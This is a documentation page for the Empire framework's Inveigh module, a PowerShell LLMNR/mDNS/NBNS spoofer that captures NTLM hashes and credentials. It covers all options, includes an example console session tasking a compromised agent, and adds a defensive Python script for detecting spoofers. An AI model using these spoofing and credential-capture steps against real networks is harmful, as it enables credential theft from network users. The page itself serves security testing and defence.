Invoke-Inveigh - Empire Module


This page contains detailed information about how to use the powershell/collection/inveigh Empire module. For a list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Inveigh
Module: powershell/collection/inveigh
Source code [1]: empire/server/modules/powershell/collection/inveigh.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-Inveigh.ps1
MITRE ATT&CK: T1171
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes

Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Note that this module exposes only a subset of Inveigh's parameters. Inveigh can be used through Empire's scriptimport and scriptcmd if additional parameters are needed.

The module metadata above lists this module as a background job that is OPSEC safe. Even so, its spoofer and listener activity can be detected by AV/EDR or network monitoring on the target system.

Note that the inveigh module does not need administrative privileges to work properly, which means that a normal user can run it.
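
As an added defender-side check (this is not code from the Empire module or from Inveigh), the following Python script sends an LLMNR query for a random hostname that no real host owns and reports any system that answers it; answering every name is exactly the behaviour of an LLMNR spoofer such as the one this module runs. It assumes an IPv4 segment and needs no privileges beyond sending UDP multicast.

```python
import random, socket, string, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR IPv4 multicast group and port

def build_query(name: str, txid: int) -> bytes:
    """LLMNR query: DNS-style header (id, flags=0, QDCOUNT=1) + one A/IN question."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def skip_name(data: bytes, off: int) -> int:
    """Advance past a name at off (labels end with 0x00 or a 2-byte pointer)."""
    while data[off] != 0 and data[off] & 0xC0 != 0xC0:
        off += data[off] + 1
    return off + (2 if data[off] & 0xC0 == 0xC0 else 1)

def parse_answers(data: bytes, txid: int) -> list:
    """Return A-record IPs from a response whose transaction id matches our query."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", data)
    if rid != txid or not flags & 0x8000:    # wrong id, or QR bit not set
        return []
    off = 12
    for _ in range(qd):                      # skip echoed question(s)
        off = skip_name(data, off) + 4       # + QTYPE + QCLASS
    ips = []
    for _ in range(an):
        off = skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", data, off)
        if rtype == 1 and rdlen == 4:        # A record
            ips.append(socket.inet_ntoa(data[off + 10:off + 14]))
        off += 10 + rdlen
    return ips

def probe(timeout: float = 2.0) -> list:
    """Query a random, nonexistent name; return [(responder_ip, [answer_ips])]."""
    name = "".join(random.choices(string.ascii_lowercase, k=12))
    txid = random.randrange(0x10000)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:                      # collect every responder until timeout
                data, (src, _port) = s.recvfrom(2048)
                if ips := parse_answers(data, txid):
                    hits.append((src, ips))
        except socket.timeout:
            pass
    return hits
```

Any non-empty result from probe() is worth an alert, since a legitimate network never answers a query for a name that does not exist.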

Required Module Options


This is a list of options that are required by the inveigh module:

Agent
Agent to run module on.

RunTime
Run time duration in minutes.

Additional Module Options


This is a list of additional options that are supported by the inveigh module:

ConsoleOutput
(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.

ConsoleStatus
Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.

ConsoleUnique
(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.

ElevatedPrivilege
(Auto/Y/N) Default = Auto: Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used.

HTTP
(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture.

HTTPAuth
(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type. This setting does not apply to wpad.dat requests.

HTTPContentType
Content type for HTTP/Proxy responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse.

HTTPResponse
Content to serve as the default HTTP/Proxy response. This response will not be used for wpad.dat requests. Use PowerShell escape characters and newlines where necessary. This parameter will be wrapped in double quotes by this module.

IP
Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set.

Inspect
(Switch) Inspect LLMNR, mDNS, and NBNS traffic only.

LLMNR
(Y/N) Default = Y: Enable/Disable LLMNR spoofer.

NBNS
(Y/N) Enable/Disable NBNS spoofer.

NBNSTypes
Default = 00,20: Comma separated list of NBNS types to spoof.

Proxy
(Y/N) Enable/Disable Inveigh's proxy server authentication capture.

ProxyPort
Default = 8492: TCP port for Inveigh's proxy listener.

RunCount
Number of NTLMv1/NTLMv2 captures to perform before auto-exiting.

SMB
(Y/N) Default = Y: Enable/Disable SMB challenge/response capture.

SpooferHostsIgnore
Comma separated list of requested hostnames to ignore when spoofing.

SpooferHostsReply
Comma separated list of requested hostnames to respond to when spoofing.

SpooferIP
Response IP address for spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.

SpooferIPsIgnore
Comma separated list of source IP addresses to ignore when spoofing.

SpooferIPsReply
Comma separated list of source IP addresses to respond to when spoofing.

SpooferLearning
(Y/N) Enable/Disable LLMNR/NBNS valid host learning.

SpooferLearningDelay
Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.

SpooferRepeat
(Y/N) Default = Y: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.

WPADAuth
(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type for wpad.dat requests.

mDNS
(Y/N) Enable/Disable mDNS spoofer.

mDNSTypes
(QU,QM) Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251.

Inveigh Example Usage


Here's an example of how to use the inveigh module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/inveigh

 Author       Kevin Robertson                                                       
 Background   True                                                                  
 Comments     https://github.com/Kevin-Robertson/Inveigh                            
 Description  Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-   
              middle tool. Note that this module exposes only a subset of Inveigh's 
              parameters. Inveigh can be used through Empire's scriptimport and     
              scriptcmd if additional parameters are needed.                        
 Language     powershell                                                            
 Name         powershell/collection/inveigh                                         
 NeedsAdmin   False                                                                 
 OpsecSafe    True                                                                  
 Techniques   http://attack.mitre.org/techniques/T1171                              


,Record Options--------,-------,----------,-------------------------------------,
| Name                 | Value | Required | Description                         |
|----------------------|-------|----------|-------------------------------------|
| Agent                |       | True     | Agent to run module on.             |
|----------------------|-------|----------|-------------------------------------|
| ConsoleOutput        |       | False    | (Low/Medium/Y) Default = Y:         |
|                      |       |          | Enable/Disable real time console    |
|                      |       |          | output. Medium and Low can be used  |
|                      |       |          | to reduce output.                   |
|----------------------|-------|----------|-------------------------------------|
| ConsoleStatus        |       | False    | Interval in minutes for displaying  |
|                      |       |          | all unique captured hashes and      |
|                      |       |          | credentials. This will display a    |
|                      |       |          | clean list of captures in Empire.   |
|----------------------|-------|----------|-------------------------------------|
| ConsoleUnique        |       | False    | (Y/N) Default = Y: Enable/Disable   |
|                      |       |          | displaying challenge/response       |
|                      |       |          | hashes for only unique IP,          |
|                      |       |          | domain/hostname, and username       |
|                      |       |          | combinations.                       |
|----------------------|-------|----------|-------------------------------------|
| ElevatedPrivilege    |       | False    | (Auto/Y/N) Default = Auto: Set the  |
|                      |       |          | privilege mode. Auto will determine |
|                      |       |          | if Inveigh is running with elevated |
|                      |       |          | privilege. If so, options that      |
|                      |       |          | require elevated privilege can be   |
|                      |       |          | used.                               |
|----------------------|-------|----------|-------------------------------------|
| HTTP                 |       | False    | (Y/N) Default = Y: Enable/Disable   |
|                      |       |          | HTTP challenge/response capture.    |
|----------------------|-------|----------|-------------------------------------|
| HTTPAuth             |       | False    | (Anonymous/Basic/NTLM/NTLMNoESS)    |
|                      |       |          | HTTP listener authentication type.  |
|                      |       |          | This setting does not apply to      |
|                      |       |          | wpad.dat requests.                  |
|----------------------|-------|----------|-------------------------------------|
| HTTPContentType      |       | False    | Content type for HTTP/Proxy         |
|                      |       |          | responses. Does not apply to EXEs   |
|                      |       |          | and wpad.dat. Set to                |
|                      |       |          | "application/hta" for HTA files or  |
|                      |       |          | when using HTA code with            |
|                      |       |          | HTTPResponse.                       |
|----------------------|-------|----------|-------------------------------------|
| HTTPResponse         |       | False    | Content to serve as the default     |
|                      |       |          | HTTP/Proxy response. This response  |
|                      |       |          | will not be used for wpad.dat       |
|                      |       |          | requests. Use PowerShell escape     |
|                      |       |          | characters and newlines where       |
|                      |       |          | necessary. This paramater will be   |
|                      |       |          | wrapped in double quotes by this    |
|                      |       |          | module.                             |
|----------------------|-------|----------|-------------------------------------|
| IP                   |       | False    | Local IP address for listening and  |
|                      |       |          | packet sniffing. This IP address    |
|                      |       |          | will also be used for               |
|                      |       |          | LLMNR/mDNS/NBNS spoofing if the     |
|                      |       |          | SpooferIP parameter is not set.     |
|----------------------|-------|----------|-------------------------------------|
| Inspect              |       | False    | (Switch) Inspect LLMNR, mDNS, and   |
|                      |       |          | NBNS traffic only.                  |
|----------------------|-------|----------|-------------------------------------|
| LLMNR                |       | False    | (Y/N) Default = Y: Enable/Disable   |
|                      |       |          | LLMNR spoofer.                      |
|----------------------|-------|----------|-------------------------------------|
| NBNS                 |       | False    | (Y/N) Enable/Disable NBNS spoofer.  |
|----------------------|-------|----------|-------------------------------------|
| NBNSTypes            |       | False    | Default = 00,20: Comma separated    |
|                      |       |          | list of NBNS types to spoof.        |
|----------------------|-------|----------|-------------------------------------|
| Proxy                |       | False    | (Y/N) Enable/Disable Inveigh's      |
|                      |       |          | proxy server authentication         |
|                      |       |          | capture.                            |
|----------------------|-------|----------|-------------------------------------|
| ProxyPort            |       | False    | Default = 8492: TCP port for the    |
|                      |       |          | Inveigh's proxy listener.           |
|----------------------|-------|----------|-------------------------------------|
| RunCount             |       | False    | Number of NTLMv1/NTLMv2 captures to |
|                      |       |          | perform before auto-exiting.        |
|----------------------|-------|----------|-------------------------------------|
| RunTime              |       | True     | Run time duration in minutes.       |
|----------------------|-------|----------|-------------------------------------|
| SMB                  |       | False    | (Y/N) Default = Y: Enable/Disable   |
|                      |       |          | SMB challenge/response capture.     |
|----------------------|-------|----------|-------------------------------------|
| SpooferHostsIgnore   |       | False    | Comma separated list of requested   |
|                      |       |          | hostnames to ignore when spoofing.  |
|----------------------|-------|----------|-------------------------------------|
| SpooferHostsReply    |       | False    | Comma separated list of requested   |
|                      |       |          | hostnames to respond to when        |
|                      |       |          | spoofing.                           |
|----------------------|-------|----------|-------------------------------------|
| SpooferIP            |       | False    | Response IP address for spoofing.   |
|                      |       |          | This parameter is only necessary    |
|                      |       |          | when redirecting victims to a       |
|                      |       |          | system other than the Inveigh host. |
|----------------------|-------|----------|-------------------------------------|
| SpooferIPsIgnore     |       | False    | Comma separated list of source IP   |
|                      |       |          | addresses to ignore when spoofing.  |
|----------------------|-------|----------|-------------------------------------|
| SpooferIPsReply      |       | False    | Comma separated list of source IP   |
|                      |       |          | addresses to respond to when        |
|                      |       |          | spoofing.                           |
|----------------------|-------|----------|-------------------------------------|
| SpooferLearning      |       | False    | (Y/N) Enable/Disable LLMNR/NBNS     |
|                      |       |          | valid host learning.                |
|----------------------|-------|----------|-------------------------------------|
| SpooferLearningDelay |       | False    | Time in minutes that Inveigh will   |
|                      |       |          | delay spoofing while valid hosts    |
|                      |       |          | are being blacklisted through       |
|                      |       |          | SpooferLearning.                    |
|----------------------|-------|----------|-------------------------------------|
| SpooferRepeat        |       | False    | (Y/N) Default = Y: Enable/Disable   |
|                      |       |          | repeated LLMNR/NBNS spoofs to a     |
|                      |       |          | victim system after one user        |
|                      |       |          | challenge/response has been         |
|                      |       |          | captured.                           |
|----------------------|-------|----------|-------------------------------------|
| WPADAuth             |       | False    | (Anonymous/Basic/NTLM/NTLMNoESS)    |
|                      |       |          | HTTP listener authentication type   |
|                      |       |          | for wpad.dat requests.              |
|----------------------|-------|----------|-------------------------------------|
| mDNS                 |       | False    | (Y/N) Enable/Disable mDNS spoofer.  |
|----------------------|-------|----------|-------------------------------------|
| mDNSTypes            |       | False    | (QU,QM) Default = QU: Comma         |
|                      |       |          | separated list of mDNS types to     |
|                      |       |          | spoof. Note that QM will send the   |
|                      |       |          | response to 224.0.0.251.            |
'----------------------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/collection/inveigh) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/inveigh) > set RunTime value
[*] Set RunTime to value
(Empire: usemodule/powershell/collection/inveigh) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come in.

Author


  • Kevin Robertson

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.